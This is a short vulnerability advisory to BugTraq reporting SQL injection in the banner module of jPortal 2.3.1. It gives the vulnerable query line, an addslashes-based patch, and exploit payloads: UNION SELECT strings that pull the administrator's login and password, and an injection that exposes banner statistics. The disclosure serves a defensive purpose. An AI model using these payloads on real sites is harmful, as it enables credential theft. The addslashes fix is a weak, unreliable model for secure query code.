jportal231.txt

`Hello BugTraq,  
  
I've found possibility to inject sql code in jPortal version 2.3.1, in  
module "banner" (module/banner.inc.php).  
  
Bug is in these lines of code:  
[code]  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code] - line 192.  
  
There is unfiltered variable $haslo. In order to patch this code just do this:  
[code]  
$haslo = addslashes($haslo);  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code]  
  
[exploit]  
go to http://[victim]/jportal/banner.php and try this:  
  
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
and then:  
  
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
After that, You gain login and password of administrator.  
[/exploit]  
  
[exploit2]  
try to inject this code:  
' or id='x x - banner id  
After that, You can see statistics of not banners, to which you  
haven't got passwords.  
[/exploit2]  
  
Vendor (http://jportal2.com) has been informed already.  
  
--   
Best regards,  
Marcin "CiNU5" Krupowicz  
`